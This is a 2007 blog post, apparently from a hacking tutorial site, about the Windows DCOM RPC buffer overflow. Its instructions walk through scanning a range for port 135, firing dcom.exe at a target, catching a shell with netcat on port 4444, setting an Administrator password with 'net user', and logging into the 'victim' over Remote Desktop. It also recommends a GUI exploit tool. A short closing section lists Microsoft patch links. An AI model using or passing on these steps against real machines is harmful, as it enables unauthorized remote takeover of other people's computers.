inteliture.com
Google

Saturday, July 14, 2007

hack-RPC EXPLOIT

What is RPC exploit.

RPC stands for Remote Procedure Call. The vulnerability lies in the way RPC is implemented in most versions of Windows. The flaw involves the Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135 and other ports. When exploited via those ports, a buffer overflow is created that could allow remote attackers to run commands with the highest system privileges.

Operating systems affected

Microsoft Windows NT® 4.0
Microsoft Windows® 2000
Microsoft Windows XP
Microsoft Windows Server™ 2003

NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected.

Tools to use.

Well, there are many programs out there for u to download and use for attack. Lets see some:

  • Angry Ip Scanner (in our "Scanners" download section)
  • dcom.exe (download the one for ur need here )
  • nc.exe (in our "Scanners" download section)
  • RPC Exploit GUI v2 here

Howto use them.

  1. Angry Ip Scanner: First of all, open Angry Ip Scanner and scan an ip range for 135 port.
  2. dcom.exe: U must run it from ur MS-DOS prompt (START ---> Run ---> cmd). Then just type dcom ex. dcom 5 127.0.0.0 (pls note that when u 'll run the dcom.exe it 'll show u which number indicates each OS... in this example i use number 5).
  3. nc.exe: Just run nc.exe (from ur MS-DOS prompt again) and type nc 4444 (pls note that nc might be nc***... jst use its name or rename it to nc). Now type in net user Administrator (choose ur own pass). So, if everything went right, go to ur START ---> run ---> mstsc and just type in ur victim's ip and press connect. When connected, do whatever u like.
  4. RPC Exploit GUI v2: Not much to say excepts that works fine (ur antivirus might get this as infected or as Hacktool (read "Antiviruses" in tutorials section). Much more easier than the whole procedure describe above.

Howto protect ur self

Microsoft offers a freely downloadable patch for this vulnerability. Its available at:

Windows NT
http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows 2000
http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

Windows XP
http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

NOTE: If there is a broken link, is not our false. Just visit http://download.microsoft.com/ and search for ur self for the patch or just use the windows live update.
Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)